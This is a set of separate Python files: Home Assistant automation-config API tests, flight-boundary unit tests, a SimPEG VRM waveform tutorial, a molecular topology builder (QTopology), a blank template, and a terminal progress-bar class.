assert await async_setup_component(
hass, "automation", {"automation": automation_config}
)
@pytest.mark.parametrize("automation_config", ({},))
async def test_get_device_config(hass, hass_client, setup_automation):
"""Test getting device config."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
def mock_read(path):
"""Mock reading data."""
return [{"id": "sun"}, {"id": "moon"}]
with patch("homeassistant.components.config._read", mock_read):
resp = await client.get("/api/config/automation/config/moon")
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"id": "moon"}
@pytest.mark.parametrize("automation_config", ({},))
async def test_update_device_config(hass, hass_client, setup_automation):
"""Test updating device config."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun"}, {"id": "moon"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert list(orig_data[1]) == ["id", "trigger", "condition", "action"]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
assert written[0] == orig_data
@pytest.mark.parametrize("automation_config", ({},))
async def test_update_remove_key_device_config(hass, hass_client, setup_automation):
"""Test updating device config while removing a key."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun", "key": "value"}, {"id": "moon", "key": "value"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert list(orig_data[1]) == ["id", "trigger", "condition", "action"]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
assert written[0] == orig_data
@pytest.mark.parametrize("automation_config", ({},))
async def test_bad_formatted_automations(hass, hass_client, setup_automation):
"""Test that we handle automations without ID."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [
{
# No ID
"action": {"event": "hello"}
},
{"id": "moon"},
]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
await hass.async_block_till_done()
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
# Verify ID added to orig_data
assert "id" in orig_data[0]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
@pytest.mark.parametrize(
"automation_config",
(
[
{
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
},
{
"id": "moon",
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
},
],
),
)
async def test_delete_automation(hass, hass_client, setup_automation):
"""Test deleting an automation."""
ent_reg = er.async_get(hass)
assert len(ent_reg.entities) == 2
with patch.object(config, "SECTIONS", ["automation"]):
assert await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun"}, {"id": "moon"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.delete("/api/config/automation/config/sun")
await hass.async_block_till_done()
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert len(written) == 1
assert written[0][0]["id"] == "moon"
assert len(ent_reg.entities) == 1
|
from SDA import *
import unittest
import numpy
class FlightBoundaryTestCase(unittest.TestCase):
def setUp(self):
test_min_altitude1 = 50.0
test_max_altitude1 = 200.0
test_min_altitude2 = -300.0
test_max_altitude2 = -50.0
test_boundary_waypoints1 = numpy.array([(0,0),(0,100),(100,100),(100,0)])
test_boundary_waypoints2 = numpy.array([(-25,0),(50,50),(0,100),(-100,150),(100,150),(150,0),(50,-50),(0,-100),(100,-150),(-100,-150)])
self.test_flight_boundary1 = FlightBoundary(test_min_altitude1, test_max_altitude1, test_boundary_waypoints1)
self.test_flight_boundary2 = FlightBoundary(test_min_altitude2, test_max_altitude2, test_boundary_waypoints2)
def test_is_point_in_bounds(self):
test_point1 = numpy.array([50, 50, 100])
test_point2 = numpy.array([1, 1, 51])
test_point3 = numpy.array([99, 99, 199])
test_point4 = numpy.array([1, 1, 50])
test_point5 = numpy.array([99, 99, 200])
test_point6 = numpy.array([50, 50, 49])
test_point7 = numpy.array([50, 50, 201])
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point1))
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point2))
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point3))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point4))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point5))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point6))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point7))
test_point8 = numpy.array([100, 100, -150])
test_point9 = numpy.array([50, 51, -299])
test_point10 = numpy.array([0, 101, -51])
test_point11 = numpy.array([-49, 0, -300])
test_point12 = numpy.array([-50, -100, -50])
test_point13 = numpy.array([100, 149, -301])
test_point14 = numpy.array([-99, 149, -49])
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point8))
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point9))
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point10))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point11))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point12))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point13))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point14))
def test_path_method(self):
test_point1 = numpy.array([50, 50])
test_point2 = numpy.array([1, 1])
test_point3 = numpy.array([99, 99])
test_point4 = numpy.array([0, 0])
test_point5 = numpy.array([100, 100])
test_point6 = numpy.array([101, 99])
test_point7 = numpy.array([1, -1])
self.assertTrue(self.test_flight_boundary1.path_method(test_point1))
self.assertTrue(self.test_flight_boundary1.path_method(test_point2))
self.assertTrue(self.test_flight_boundary1.path_method(test_point3))
self.assertFalse(self.test_flight_boundary1.path_method(test_point4))
self.assertFalse(self.test_flight_boundary1.path_method(test_point5))
self.assertFalse(self.test_flight_boundary1.path_method(test_point6))
self.assertFalse(self.test_flight_boundary1.path_method(test_point7))
test_point8 = numpy.array([49, 49])
test_point9 = numpy.array([0, 101])
test_point10 = numpy.array([99, -149.8])
test_point11 = numpy.array([-99, 149])
test_point12 = numpy.array([40, 50])
test_point13 = numpy.array([0, -150])
test_point14 = numpy.array([40, -100])
self.assertTrue(self.test_flight_boundary2.path_method(test_point8))
self.assertTrue(self.test_flight_boundary2.path_method(test_point9))
self.assertTrue(self.test_flight_boundary2.path_method(test_point10))
self.assertFalse(self.test_flight_boundary2.path_method(test_point11))
self.assertFalse(self.test_flight_boundary2.path_method(test_point12))
self.assertFalse(self.test_flight_boundary2.path_method(test_point13))
self.assertFalse(self.test_flight_boundary2.path_method(test_point14))
|
"""
Response from a Homogeneous Layer for Different Waveforms
=========================================================
Here we use the module *SimPEG.electromagnetics.viscous_remanent_magnetization*
to predict the characteristic VRM response over magnetically viscous layer.
We consider a small-loop, ground-based survey which uses a coincident loop
geometry. For this tutorial, we focus on the following:
- How to define the transmitters and receivers
- How to define the survey
- How to define a diagnostic physical property
- How to define the physics for the linear potential fields formulation
- How the VRM response depends on the transmitter waveform
Note that for this tutorial, we are only modeling the VRM response. A separate
tutorial has been developed for modeling both the inductive and VRM responses.
"""
import SimPEG.electromagnetics.viscous_remanent_magnetization as vrm
from discretize import TensorMesh
from discretize.utils import mkvc
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
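# Define the four transmitter waveforms being compared: step-off, square
# pulse, and trapezoidal/triangular pulses built with ArbitraryPiecewise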
waveform_list = []
waveform_list.append(vrm.waveforms.StepOff(t0=0))
waveform_list.append(vrm.waveforms.SquarePulse(t0=0, delt=0.02))
t_wave = np.r_[-0.03, -0.02, -0.01, 0]
I_wave = np.r_[0.0, 1.0, 1.0, 0]
waveform_list.append(vrm.waveforms.ArbitraryPiecewise(t_wave=t_wave, I_wave=I_wave))
t_wave = np.r_[-0.04, -0.02, 0]
I_wave = np.r_[0.0, 1.0, 0]
waveform_list.append(vrm.waveforms.ArbitraryPiecewise(t_wave=t_wave, I_wave=I_wave))
fig = plt.figure(figsize=(8, 4))
mpl.rcParams.update({"font.size": 12})
ax1 = fig.add_axes([0.1, 0.1, 0.85, 0.85])
ax1.plot(np.r_[-0.04, 0.0, 0.0, 0.02], np.r_[1, 1, 0, 0], "b", lw=2)
ax1.plot(np.r_[-0.04, -0.02, -0.02, 0.0, 0.0, 0.04], np.r_[0, 0, 1, 1, 0, 0], "r", lw=2)
ax1.plot(np.r_[-0.04, -0.03, -0.02, -0.01, 0, 0.04], np.r_[0, 0, 1, 1, 0, 0], "k", lw=2)
ax1.plot(np.r_[-0.04, -0.02, 0, 0.04], np.r_[0, 1, 0, 0], "g", lw=2)
ax1.set_xlim((-0.04, 0.04))
ax1.set_ylim((-0.01, 1.1))
ax1.set_xlabel("time [s]")
ax1.set_ylabel("current [A]")
ax1.set_title("Waveforms")
ax1.legend(
["step-off", "20 ms square pulse", "30 ms trapezoidal", "40 ms triangular"],
loc="upper right",
)
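# Define the survey: a single station at (0, 0, 0.5) with z-oriented dB/dt
# receivers and one dipole source per waveform (coincident-loop geometry)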
time_channels = np.logspace(-4, -1, 31)
xyz = np.c_[0.0, 0.0, 0.5]
dbdt_receivers = [
vrm.receivers.Point(xyz, times=time_channels, fieldType="dbdt", orientation="z")
]
source_list = []
dipole_moment = [0.0, 0.0, 1]
for pp in range(0, len(waveform_list)):
# Define the transmitter-receiver pair for each waveform
source_list.append(
vrm.sources.MagDipole(
dbdt_receivers, mkvc(xyz), dipole_moment, waveform_list[pp]
)
)
survey = vrm.Survey(source_list)
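# Define a tensor mesh and a homogeneous model for the magnetically viscous
# layer (all cells active)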
cs, ncx, ncy, ncz, npad = 2.0, 35, 35, 5, 5
hx = [(cs, npad, -1.3), (cs, ncx), (cs, npad, 1.3)]
hy = [(cs, npad, -1.3), (cs, ncy), (cs, npad, 1.3)]
hz = [(cs, ncz)]
mesh = TensorMesh([hx, hy, hz], "CCN")
model_value = 0.0001
model = model_value * np.ones(mesh.nC)
ind_active = np.ones(mesh.nC, dtype="bool")
simulation = vrm.Simulation3DLinear(
mesh,
survey=survey,
indActive=ind_active,
refinement_factor=2,
refinement_distance=[2.0, 4.0],
)
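# Predict dB/dt data for every waveform and reshape to (times, waveforms)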
dpred = simulation.dpred(model)
n_times = len(time_channels)
n_waveforms = len(waveform_list)
dpred = np.reshape(dpred, (n_waveforms, n_times)).T
fig = plt.figure(figsize=(6, 7))
ax1 = fig.add_axes([0.15, 0.1, 0.8, 0.85])
ax1.loglog(time_channels, -dpred[:, 0], "b", lw=2)
ax1.loglog(time_channels, -dpred[:, 1], "r", lw=2)
ax1.loglog(time_channels, -dpred[:, 2], "k", lw=2)
ax1.loglog(time_channels, -dpred[:, 3], "g", lw=2)
ax1.set_xlim((np.min(time_channels), np.max(time_channels)))
ax1.set_xlabel("time [s]")
ax1.set_ylabel("-dBz/dt [T/s]")
ax1.set_title("Characteristic Decay")
ax1.legend(
["step-off", "20 ms square pulse", "30 ms trapezoidal", "40 ms triangular"],
loc="upper right",
)
|
"""
This module implements an internal topology builder class QTopology.
QTopology creates a mapping between the system's structure (QStruct),
bonding patterns/charges (QLib), and the parameters (Qrm), allowing
evaluation of individual topological components of the system.
"""
from __future__ import absolute_import, unicode_literals, division
from Qpyl.core import qlibrary
from Qpyl.core import qparameter
from Qpyl.core import qstructure
from Qpyl.core import qpotential
from six.moves import range
class QTopologyError(Exception):
pass
class QTopology(object):
"""
Class for storing topology information.
(mashup of library, parameter and structure data)
Contains lists of atoms, bonds, angles, torsions
and impropers, along with their parameters.
The constructor takes in three arguments:
qlib (qlibrary.QLib object)
qprm (qparameter.QPrm object)
qstruct (qstructure.QStruct object)
Typical usage:
qlib = qlibrary.QLib("amber")
qprm = qparameter.QPrm("amber")
qstruct = qstructure.QStruct()
qlib.read_lib(".../qamber14.lib")
qprm.read_prm(".../qamber14.prm")
qstruct.read_pdb(".../14u3.pdb")
        try:
            qtopo = QTopology(qlib, qprm, qstruct)
        except QTopologyError as e:
            print("Failed to make topology: " + str(e))
        for bond in qtopo.bonds:
            print("%s: fk %.2f, r0 %.2f, r %.2f, E(r) %.2f" %
                  (bond, bond.prm.fc, bond.prm.r0, bond.r, bond.energy))
"""
def __init__(self, qlib, qprm, qstruct):
# do some type checking to prevent bad things from happening
for arg, _type in ((qlib, qlibrary.QLib),
(qprm, qparameter.QPrm),
(qstruct, qstructure.QStruct)):
if not isinstance(arg, _type):
raise QTopologyError("{} not of type {}".format(arg, _type))
if qlib.ff_type != qprm.ff_type:
raise QTopologyError("QLib FF ({}) not "
"compatible with QPrm FF ({})"
.format(qlib.ff_type, qprm.ff_type))
self.qlib = qlib
self.qprm = qprm
self.qstruct = qstruct
try:
self.qlib.check_valid() # check if lib entries are good
except qlibrary.QLibError as e:
raise QTopologyError(e)
self.residues = []
self.atoms = []
self.bonds = []
self.angles = []
self.torsions = []
self.impropers = []
for residue_struct in self.qstruct.residues:
# see if it is defined in the library
try:
residue_lib = self.qlib.residue_dict[residue_struct.name]
except KeyError:
raise QTopologyError("Residue '{}' not found in library"
.format(residue_struct.name))
# create new object for the residue
res_index = len(self.residues) + 1
residue_top = _TopoResidue(res_index, residue_struct, residue_lib)
self.residues.append(residue_top)
# get atoms and bonds within the residue
self._get_atoms(residue_top)
self._get_bonds(residue_top)
# get angles, torsions and impropers from the bonds
self._get_angles_torsions()
# get impropers (from the lib entries)
self._get_impropers()
def _get_atoms(self, residue_top):
"""
Creates _TopoAtom objects and adds them to
_TopoResidue and QTopology.atoms
"""
# iterate over the atoms in the library
for atom in residue_top.lib.atoms:
aname, atype, charge = atom.name, atom.atom_type, atom.charge
# check if atoms exist in the structure
try:
atom_struct = [a for a in residue_top.struct.atoms
if a.name == aname][0]
except IndexError:
raise QTopologyError("Atom '{}' in residue '{}.{}'"
" missing in the structure"
.format(aname,
residue_top.struct.index_struct,
residue_top.struct.name))
# check if atom parameters exist
try:
atom_prm = self.qprm.atom_types[atype]
except KeyError:
raise QTopologyError("Atom type '{}' not found!"
.format(atype))
# add new atom to list (and to the residue_top)
atom_index = len(self.atoms) + 1
a = _TopoAtom(atom_index, aname, charge, atom_prm,
atom_struct, residue_top)
self.atoms.append(a)
residue_top.add_atom(a)
def _get_bonds(self, residue_top):
"""
Creates _TopoBond objects and adds them to QTopology.bonds
"""
# iterate over the bonds in the library
for bond in residue_top.lib.bonds:
# find the atom objects with those names
atoms = [a for a in residue_top.atoms if a.name in bond]
# find parameters
atom_types = [a.prm.atom_type for a in atoms]
prm_id = qparameter._PrmBond.get_id(atom_types)
try:
bond_prm = self.qprm.bonds[prm_id]
except KeyError:
raise QTopologyError("Bond type '{}' not found!"
.format(prm_id))
# create _TopoBond object
self.bonds.append(_TopoBond(atoms, bond_prm))
try:
# -2 is assuming that the current one was just added (-1)
prev_res = self.residues[-2]
except IndexError:
# first residue
pass
# don't check separate chains
else:
if residue_top.struct.molecule == prev_res.struct.molecule:
for conn in residue_top.lib.connections:
for conn_prev in prev_res.lib.connections:
if "head" in conn and "tail" in conn_prev:
ahead = [a for a in residue_top.atoms if
a.name == conn.split()[1]][0]
atail = [a for a in prev_res.atoms if
a.name == conn_prev.split()[1]][0]
atoms = [atail, ahead]
atom_types = [a.prm.atom_type for a in atoms]
prm_id = qparameter._PrmBond.get_id(atom_types)
try:
bond_prm = self.qprm.bonds[prm_id]
except KeyError:
raise QTopologyError("Bond type '{}'"
"not found!"
.format(prm_id))
# create _TopoBond object
self.bonds.append(_TopoBond(atoms, bond_prm))
def _get_angles_torsions(self):
"""
Creates _TopoAngle and _TopoTorsion objects and
adds them to QTopology.angles and QTopology.torsions
"""
# to prevent backtracking
processed_bonds = set()
# iterate over all bonds and find the angles
for bond1 in self.bonds:
processed_angle_bonds = set()
for bond2 in bond1.atoms[0].bonds + bond1.atoms[1].bonds:
if bond2 == bond1 or bond2 in processed_bonds:
continue
atoms1 = set(bond1.atoms)
atoms2 = set(bond2.atoms)
common_atom = atoms1 & atoms2
side_atoms = atoms1 ^ atoms2
angle_atoms = [side_atoms.pop(),
common_atom.pop(),
side_atoms.pop()]
# find the angle parameter
angle_atypes = [a.prm.atom_type for a in angle_atoms]
prm_id = qparameter._PrmAngle.get_id(angle_atypes)
try:
angle_prm = self.qprm.angles[prm_id]
except KeyError:
raise QTopologyError("Angle type '{}' not found!"
.format(prm_id))
# create _TopoAngle object
self.angles.append(_TopoAngle(angle_atoms, angle_prm))
# find the torsions by looking at the bonds
# of the angle's side atoms
for side_atom_index in [0, 2]:
for bond3 in angle_atoms[side_atom_index].bonds:
if bond3 in processed_bonds or \
bond3 in processed_angle_bonds:
continue
try:
atom4 = [a for a in bond3.atoms
if a not in angle_atoms][0]
except IndexError:
# both atoms are part of the angle
continue
if side_atom_index == 0:
torsion_atoms = [atom4] + angle_atoms
else:
torsion_atoms = angle_atoms + [atom4]
# TODO: QPrm.find_type() would be better
#
# find parameters
atom_types = [a.prm.atom_type for a in torsion_atoms]
prm_id = qparameter._PrmTorsion.get_id(atom_types)
try:
torsion_prm = self.qprm.torsions[prm_id]
except KeyError:
# see if generic parameters exist
gen_atypes = ["?"] + prm_id.split()[1:3] + ["?"]
prm_id_gen = qparameter._PrmTorsion.get_id(gen_atypes)
try:
torsion_prm = \
self.qprm.generic_torsions[prm_id_gen]
except KeyError:
raise QTopologyError("Torsions type '{}' "
"for torsion '{}'"
"not found!"
.format(prm_id,
" ".join([a.name for a in
torsion_atoms])))
# create _TopoTorsion object
self.torsions.append(_TopoTorsion(torsion_atoms,
torsion_prm))
# remove the 'angle' bond from the torsion search
# (otherwise you get forward and reverse duplicates)
processed_angle_bonds.add(bond2)
# remove the bond from the search (to prevent backtracking)
processed_bonds.add(bond1)
def _get_impropers(self):
# create impropers -
# only those that are explicitly defined in the library
for residue_index, residue in enumerate(self.residues):
for improper in residue.lib.impropers:
# find _TopoAtom-s involved
atoms = []
for aname in improper:
res = residue
# some impropers span to next or
# previous residues (-C, +N)
if "+" in aname:
if residue_index+1 == len(self.residues):
continue
res = self.residues[residue_index+1]
if "-" in aname:
if residue_index == 0:
continue
res = self.residues[residue_index-1]
# if separate chains, skip
if residue.struct.molecule != res.struct.molecule:
continue
aname = aname.strip("+-")
try:
atoms.append([a for a in res.atoms
if a.name == aname][0])
except IndexError:
if not res.lib.connections:
# no connectivity between residues
# (end of protein - ligands or water)
continue
else:
raise QTopologyError("Bad improper '{}' between "
"residues '{}' and '{}'"
.format(" ".join(improper),
residue.index,
res.index))
if len(atoms) != 4:
continue
# find parameters
other_atypes = [a.prm.atom_type for a in atoms]
center_atype = other_atypes.pop(1)
prm_id = qparameter._PrmImproper.get_id(center_atype, other_atypes)
try:
improper_prm = self.qprm.impropers[prm_id]
except KeyError:
improper_prm = None
# see if general parameters exist - a lot of options here, example:
# CA O2 CB CN
#
# Single wildcard:
# ? O2 CA CN
# ? O2 CA CB
# ? O2 CB CN
                if improper_prm is None:
for i in range(3):
ots = [other_atypes[i], other_atypes[(i+1)%3], "?"]
prm_id_gen = qparameter._PrmImproper.get_id(center_atype, ots)
try:
improper_prm = \
self.qprm.generic_impropers[prm_id_gen]
break
except KeyError:
improper_prm = None
# Two wildcards:
# ? O2 CB ?
# ? O2 CA ?
# ? O2 CN ?
                if improper_prm is None:
for i in range(3):
otypes = [other_atypes[i], "?", "?"]
prm_id_gen = qparameter._PrmImproper.get_id(center_atype, otypes)
try:
improper_prm = \
self.qprm.generic_impropers[prm_id_gen]
break
except KeyError:
improper_prm = None
                if improper_prm is None:
raise QTopologyError("Improper type '{}' "
"not found!"
.format(prm_id))
# create _TopoImproper object (same order as library)
self.impropers.append(_TopoImproper(atoms, improper_prm))
class _TopoAtom(object):
"""
Class containing topological information for an atom.
Arguments:
index (int): topology index of atom (1-based)
name (string): atom name as defined in the library/structure
charge (float): charge as defined in the QLib library
prm (_PrmAtom): atom parameter as defined in QPrm
struct (_StructAtom): atom structure object (stuff from PDB)
residue (_TopoResidue): reference to its parent residue
All these arguments are stored as object properties with the same name.
    Additionally, bonds, angles, torsions and impropers are lists that contain
references to _TopoBond, _TopoAngles etc. objects. These are filled in
automatically when creating aforementioned objects.
"""
def __init__(self, index, name, charge, prm, struct, residue):
self.index = index
self.name = name
self.charge = charge
self.prm = prm
self.struct = struct
self.residue = residue
self.bonds = []
self.angles = []
self.torsions = []
self.impropers = []
self.bati_map = {_TopoBond: self.bonds,
_TopoAngle: self.angles,
_TopoTorsion: self.torsions,
_TopoImproper: self.impropers}
def __repr__(self):
return "_TopoAtom: {}_{}.{}".format(self.residue.name,
self.residue.index,
self.name)
def add_ref(self, bond_angle_tor_imp):
"""
Add bond, angle, torsion and improper references.
See class docstring.
"""
_type = type(bond_angle_tor_imp)
try:
self.bati_map[_type].append(bond_angle_tor_imp)
except KeyError:
raise TypeError("bond_agle_tor_imp of unsupported "
"type: {}".format(_type))
class _TopoResidue(object):
"""
Class containing topological information for a residue.
Arguments:
index (int): topology index of residue (1-based)
struct (_StructResidue): object with structure information
lib (_LibResidue): object with library information
Besides the two properties above, it contains a list of its atoms
as _TopoAtom objects in the 'atoms' property. This list is filled
automatically as atoms are created with this residue passed in as an
argument.
"""
def __init__(self, index, struct, lib):
self.index = index
self.struct = struct
self.lib = lib
self.name = struct.name
self.atoms = []
def add_atom(self, atom):
"""Append a _TopoAtom object to the 'atoms' list"""
self.atoms.append(atom)
class _TopoBonding(object):
"""Abstract class for topology bonds, angles, torsions and impropers.
Arguments:
atoms (list): list of _TopoAtom objects
prm (_PrmBond): object with bond parameters
"""
def __init__(self, atoms, prm):
self.prm = prm
atom_indexes = [(a.index, a) for a in atoms]
if isinstance(self, _TopoBond):
atom_indexes.sort()
elif isinstance(self, _TopoAngle):
atom_indexes = min(atom_indexes, list(reversed(atom_indexes)))
elif isinstance(self, _TopoTorsion):
atom_indexes = min(atom_indexes, list(reversed(atom_indexes)))
elif isinstance(self, _TopoImproper):
# order is defined in the library
pass
self.atoms = [a for (i,a) in atom_indexes]
for a in self.atoms:
a.add_ref(self)
def __repr__(self):
atoms_str = "-".join([a.name for a in self.atoms])
return "{}: ({})".format(self.__class__.__name__, atoms_str)
class _TopoBond(_TopoBonding):
"""Contains topological information for a bond.
Extends _TopoBonding, implements calc()
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, r=None):
"""Calculate bond distance and energy.
Args:
r (float, optional): define the bond distance instead of
calculating it from the structure
Returns tuple (E [kcal/mol], r [angstrom])
"""
if not r:
ac1, ac2 = [a.struct.coordinates for a in self.atoms]
r = qpotential.bond_distance(ac1, ac2)
e = qpotential.bond_energy(r, self.prm.fc, self.prm.r0)
return (e,r)
class _TopoAngle(_TopoBonding):
"""Contains topological information for an angle.
Extends _TopoBonding, implements calc()
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, theta=None):
"""Calculate angle and energy
Args:
theta (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], theta [degrees])
"""
        if theta is None:
ac1, ac2, ac3 = [a.struct.coordinates for a in self.atoms]
theta = qpotential.angle_angle(ac1, ac2, ac3)
e = qpotential.angle_energy(theta,
self.prm.fc,
self.prm.theta0)
return (e, theta)
class _TopoTorsion(_TopoBonding):
"""Contains topological information for a torsion.
Extends _TopoBonding, implements calc(), prm_full
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, phi=None):
"""Calculate torsion angle and energy
Args:
phi (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], phi [degrees])
"""
        if phi is None:
ac1, ac2, ac3, ac4 = [a.struct.coordinates for a in self.atoms]
phi = qpotential.torsion_angle(ac1, ac2, ac3, ac4)
energy = 0
for fc, multiplicity, phase, npaths in self.prm.get_prms():
energy += qpotential.torsion_energy(phi,
fc, multiplicity,
npaths, phase)
return (energy, phi)
@property
def prm_full(self):
"""Return full parameter in case it is generic.
Basically, make a copy of the generic parameter,
but use actual atom-types instead of X's.
"""
if self.prm.is_generic:
atypes = [a.prm.prm_id for a in self.atoms]
comment = "Generic: {}".format(self.prm.prm_id)
full_prm = type(self.prm)(atypes, comment=comment)
for p in self.prm.get_prms():
full_prm.add_prm(*p)
return full_prm
else:
return self.prm
class _TopoImproper(_TopoBonding):
"""Contains topological information for an improper.
Extends _TopoBonding, implements calc(), prm_full
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, phi=None):
"""Calculate improper angle and energy
Args:
phi (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], phi [degrees])
"""
        if phi is None:
ac1, ac2, ac3, ac4 = [a.struct.coordinates for a in self.atoms]
phi = qpotential.improper_angle(ac1, ac2, ac3, ac4)
e = qpotential.improper_energy_periodic(phi,
self.prm.fc,
self.prm.multiplicity,
self.prm.phi0)
return (e, phi)
@property
def prm_full(self):
"""Return full parameter in case it is generic.
Basically, make a copy of the generic parameter,
but use actual atom-types instead of X's.
"""
if self.prm.is_generic:
atypes = [a.prm.prm_id for a in self.atoms]
center = atypes.pop(1)
comment = "Generic: {}".format(self.prm.prm_id)
full_prm = type(self.prm)(center, atypes, self.prm.fc,
self.prm.phi0, self.prm.multiplicity,
comment=comment)
return full_prm
else:
return self.prm
|
def func_TODO():
'''
TODO
:param: TODO TODO
:return: TODO
'''
pass
class ClassTODO:
'''
TODO
'''
def __init__(self):
'''
Constructor for TODO
'''
pass
def main():
'''
Main execution point of the program
'''
pass
if __name__ == "__main__":
main()
|
from __future__ import print_function
import sys
import re
import time, datetime
class ProgressBar(object):
def __init__(self, total_items):
"""Initialized the ProgressBar object"""
#Vars related to counts/time
self.total_items = total_items
self.current = 0
self.finished = False
self.start_epoch = None #Set to none, start when first iteration occurs
#Vars related to output
self.width = 40 #Length of progress bar
self.symbol = "#" #Needs to be 1 char
self.output = sys.stderr
self.fmt = '''%(percent)3d%% %(bar)s %(current)s/%(total_items)s %(items_per_sec)s ETA: %(eta)s %(bucket_name)s'''
assert len(self.symbol) == 1 #If higher, progress bar won't populate properly
        assert self.width <= 150 #If higher, it'll take up more than one line of text
    def __call__(self, num_completed=1, print_bucket_names=False, bucket_name=""):
"""Actions to run when progress is run"""
#Initialize the start time as the first iteration (just in case progress bar is initialized early)
if self.start_epoch is None:
self.start_epoch = int(time.time())
#Update calculations/values
        self.current += num_completed
        try:
            percent = self.current / float(self.total_items)
        except ZeroDivisionError:
            percent = 0
size = int(self.width * percent)
run_time = time.time() - self.start_epoch
remaining = self.total_items - self.current
        try:
            time_left = (run_time/self.current) * remaining
        except ZeroDivisionError:
            time_left = 0
#Args to populate into fmt
if print_bucket_names:
bn = "Bucket: %s\n" % (bucket_name)
else:
bn = ""
args = {
'percent': (percent * 100),
'bar': '''[{symbols}{spaces}]'''.format(symbols=(self.symbol * size), spaces=' ' * (self.width - size)),
'current': "{:,}".format(self.current),
'total_items': "{:,}".format(self.total_items),
'items_per_sec': "{items_per_sec}/sec".format(items_per_sec="{:,}".format(int(self.current / run_time))),
'eta': self.get_eta(int(time_left)),
'run_time': self.get_eta(run_time),
'bucket_name': bn,
}
#Print the update
print('\r' + self.fmt%args, file=self.output, end=' ')
def get_eta(self, time_left):
"""Print the num hour, min and/or sec for the given number of seconds"""
time_remaining = time.gmtime(time_left)
months_left = time_remaining.tm_mon-1
days_left = time_remaining.tm_mday-1
if months_left:
return "{months_left}m {days_left}d {hr}h {min}m {sec}s".format(months_left=months_left, days_left=days_left, hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif days_left:
return "{days_left}d {hr}h {min}m {sec}s".format(days_left=days_left, hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif time_remaining.tm_hour:
return "{hr}h {min}m {sec}s".format(hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif time_remaining.tm_min:
return "{min}m {sec}s".format(min=time_remaining.tm_min, sec=time_remaining.tm_sec)
else:
return "{sec}s".format(sec=time_remaining.tm_sec)
def done(self):
"""Prints completion statement, only once"""
#Be sure done hasn't already been called, set if not
if not self.finished:
self.finished = True
run_time = time.gmtime(time.time() - self.start_epoch)
final_output = '''
FINISHED at {date_time}
Total time: {total_time}
Total completed: {total_items_done}'''.format(
date_time = str(datetime.datetime.now()),
total_items_done = self.current,
